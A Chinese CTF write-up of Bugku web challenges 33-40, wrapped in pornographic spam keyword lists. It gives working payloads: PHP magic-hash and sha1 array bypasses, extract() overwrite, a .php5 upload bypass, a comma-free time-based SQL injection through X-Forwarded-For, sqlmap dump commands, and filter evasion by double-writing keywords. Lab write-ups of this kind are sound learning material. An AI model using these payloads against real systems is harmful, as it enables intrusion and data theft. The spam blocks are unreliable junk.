日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

bugku web题 33-40 wp

發(fā)布時(shí)間:2024/3/24 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 bugku web题 33-40 wp 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

md5 collision

要求input a,題目提示很清楚了。
利用php的特性:

PHP在處理哈希字符串時(shí),會(huì)利用”!=”或”==”來(lái)對(duì)哈希值進(jìn)行比較,它把每一個(gè)以”0E”開頭的哈希值都解釋為0,所以如果兩個(gè)不同的密碼經(jīng)過(guò)哈希以后,其哈希值都是以”0E”開頭的,那么PHP將會(huì)認(rèn)為他們相同,都是0。

0e開頭的MD5匯總
payload:?a=s878926199a


各種繞過(guò)

php審計(jì):

<?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) {if ($_GET['uname'] == $_POST['passwd'])print 'passwd can not be uname.';else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))die('Flag: '.$flag);elseprint 'sorry!'; } ?>

要求:
$_GET['uname'] != $_POST['passwd']
sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')

sha1函數(shù)漏洞:

sha1()函數(shù)無(wú)法處理數(shù)組類型,將報(bào)錯(cuò)并返回NULL

構(gòu)造:
uname[]=a;
passwd[]=b;
id=margin;

得到flag


web8

hint:txt??!
審計(jì):

<?php extract($_GET); //extract() 函數(shù)從數(shù)組中將變量導(dǎo)入到當(dāng)前的符號(hào)表。 if (!empty($ac)) { $f = trim(file_get_contents($fn));//trim()去除字符串首尾處的空白字符(或者其他字符) if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?>

要求:
extract($_GET)
$f = trim(file_get_contents($fn))
$ac === $f
提示有txt文件,經(jīng)嘗試發(fā)現(xiàn):flag.txt 內(nèi)容為:flags

構(gòu)造payload:
http://120.24.86.145:8002/web8/?ac=flags&fn=flag.txt

得到flag


細(xì)心

hint:想辦法變成admin
打開頁(yè)面如下:

沒有任何線索。最后在robot.txt下發(fā)現(xiàn)如下內(nèi)容:

User-agent: *
Disallow: /resusl.php

robot.txt是網(wǎng)站爬蟲規(guī)則的描述,相關(guān)自行百度。

打開result.php:

payload:
http://120.24.86.145:8002/web13/resusl.php?x=admin
額,鬼知道他這個(gè)密碼是哪來(lái)的,就當(dāng)是撞默認(rèn)密碼吧。或者用字典爆破。

求getshell

先說(shuō)解法:

上傳1.php.jpg
用burp抓包,找到content-type字段:
Content-Type: multipart/form-data; boundary=---------------------------146043902153
修改 multipart/form-data的大小寫,
最后將文件后綴改為 .php5,提交得到flag。

這題我還沒弄明白
網(wǎng)上說(shuō)這題是后綴名黑名單檢測(cè)和類型檢測(cè)

php別名:php2, php3, php4, php5, phps, pht, phtm, phtml(只有php5沒被過(guò)濾)
至于為什么修改content-Type大小寫可以繞過(guò),我還沒搞懂。

Http Header里的Content-Type


INSERT INTO注入

給出代碼如下:

error_reporting(0);function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } /************獲取IP*************************************/$ip_arr = explode(',', $ip);//過(guò)濾逗號(hào) return $ip_arr[0];}$host="localhost"; $user=""; $pass=""; $db="";$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");mysql_select_db($db) or die("Unable to select database");$ip = getIp(); echo 'your ip is :'.$ip; $sql="insert into client_ip (ip) values ('$ip')"; mysql_query($sql);

可以看到,這是X-Forwarded-For的注入,而且過(guò)濾了逗號(hào),。在過(guò)濾了逗號(hào)的情況下,我們就不能使用if語(yǔ)句了,在mysql中與if有相同功效的就是:
select case when 語(yǔ)句1 then 語(yǔ)句1 else 語(yǔ)句1 end;
當(dāng)語(yǔ)句1為真,執(zhí)行語(yǔ)句2,否則執(zhí)行語(yǔ)句3

而且由于逗號(hào),被過(guò)濾,我們就不能使用substr、substring了,但我們可以使用:from 1 for 1,所以最終我們的payload如下:
127.0.0.1'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))-- +
腳本之后補(bǔ)上。

這是一個(gè)神奇的登陸框

打開頁(yè)面顯示一個(gè)登陸框:
測(cè)試語(yǔ)句:' " / \ | )
報(bào)錯(cuò),這意味著該頁(yè)面無(wú)法處理某些特殊字符,可能存在注入。
分析報(bào)錯(cuò)語(yǔ)句得到變量由"包裹。
測(cè)試語(yǔ)句:admin_name=" or 1=1#&admin_passwd=&submit=GO GO GO爆出用戶名字段,存在注入。
丟進(jìn)sqlmap:
因?yàn)槭莗ost請(qǐng)求,用burp抓包保存請(qǐng)求頭文件bugku.txt
爆數(shù)據(jù)庫(kù):python sqlmap.py -r "C:\Users\horyit\Desktop\雜項(xiàng)\bugku.txt" -p admin_name --dbs
爆表名:python sqlmap.py -r "C:\Users\horyit\Desktop\雜項(xiàng)\bugku.txt" -p admin_name -D bugkusql1 --tables
爆字段名:python sqlmap.py -r "C:\Users\horyit\Desktop\雜項(xiàng)\bugku.txt" -p admin_name -D bugkusql1 -T flag1 --columns
獲取數(shù)據(jù):python sqlmap.py -r "C:\Users\horyit\Desktop\雜項(xiàng)\bugku.txt" -p admin_name -D bugkusql1 -T flag1 -C --dump

ps:爆字段名是出現(xiàn)問(wèn)題,手注顯示錯(cuò)誤Got error 28 from storage engine,百度無(wú)果,感覺是題出了問(wèn)題。但做題的邏輯應(yīng)該就是這樣。
flag:flag{ed6b28e684817d9efcaf802979e57aea}


多次

經(jīng)測(cè)試:單引號(hào)報(bào)錯(cuò),加注釋返回正常,有過(guò)濾。
判斷過(guò)濾:異或注入(同假異真),過(guò)濾了union,select,or(注意order里面有or,這是個(gè)坑),and
關(guān)于異或注入
嘗試?yán)@過(guò):重寫 如:union –>uniunionon
發(fā)現(xiàn)可以繞過(guò)
payload:http://120.24.86.145:9004/1ndex.php?id=1' uniounionn selecselectt 1,2%23
之后就是常規(guī)操作。
出了一點(diǎn)問(wèn)題,之后補(bǔ)上。

總結(jié)

以上是生活随笔為你收集整理的bugku web题 33-40 wp的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 91狠狠 | 欧美在线xxxx| 国产黄色片在线观看 | 色七七桃花综合影院 | 久久夜色网| 精品国产日本 | 在线观看欧美一区二区 | av网页在线观看 | 国产精品视频一区二区三区不卡 | 亚洲国产精品毛片av不卡在线 | 自拍愉拍 | 超碰下载页面 | 胖女人做爰全过程 | 成人片黄网站色大片免费毛片 | 欧美成人不卡 | 影音先锋中文字幕第一页 | 无码精品一区二区三区在线播放 | 成人久久18免费网站图片 | 亚洲一区二区免费看 | 在线观看视频你懂得 | 亚洲欧洲国产日韩 | 亚洲精品美女 | 亚洲乱码一区二区 | 91丨porny丨刺激 | 最新天堂在线视频 | 五月天堂色 | 最新av观看 | 波多野吉衣一二三区乱码 | 日韩av电影中文字幕 | 91丨九色丨国产 | 精品久久久视频 | 看av免费毛片手机播放 | 这里只有久久精品 | 中国浓毛少妇毛茸茸 | 国产精品高潮呻吟久久久久久 | 黑料福利 | 国产视频www | 夜夜夜综合 | 波多野一区二区三区 | www.色亚洲 | 夜色伊人| jizjiz中国少妇高潮水多 | free性满足hd国产精品久 | 中文字幕在线观看精品 | 欧美三级久久久 | 天天拍夜夜爽 | 女同激情久久av久久 | 亚洲免费观看高清完整版在线 | 丰满少妇麻豆av苏语棠 | 97免费公开视频 | h视频免费在线观看 | bangbros性欧美18 | 成年人在线播放 | 国产五月天婷婷 | 噼里啪啦免费看 | 婷婷丁香激情五月 | 美景之屋电影免费高清完整韩剧 | 国产一级精品视频 | 人人射人人射 | 17c国产精品 | 91精品欧美一区二区三区 | √资源天堂中文在线视频 | 你懂的网站在线观看 | 久久久久亚洲AV成人无码国产 | 日韩成人激情 | 欧美精品一二三四区 | 波多野结衣亚洲天堂 | av小说在线观看 | 一级黄色片在线观看 | 91极品蜜桃臀 | 少妇全黄性生交片 | 国产91在线观看丝袜 | 性感美女被爆操 | 男生操女生网站 | 日本天堂在线视频 | 天堂亚洲 | 成人免费黄色大片 | 在线观看日本 | 一本大道久久久久精品嫩草 | 久久久久影视 | xxxxx黄色 | 九九爱爱视频 | 这里只有精品久久 | 99在线精品免费视频 | 天天av网 | 国产欧美一区二区三区在线看蜜臀 | 久久国产三级 | 日韩午夜在线播放 | 综合av第一页 | 成人精品视频在线观看 | 中文字幕一区二区免费 | 久久午夜免费视频 | 超碰黑丝| 男人的天堂网在线 | caopor超碰| 精品人妻一区二区三区香蕉 | 欧美亚洲国产另类 | xxxx色| 国内外成人免费视频 |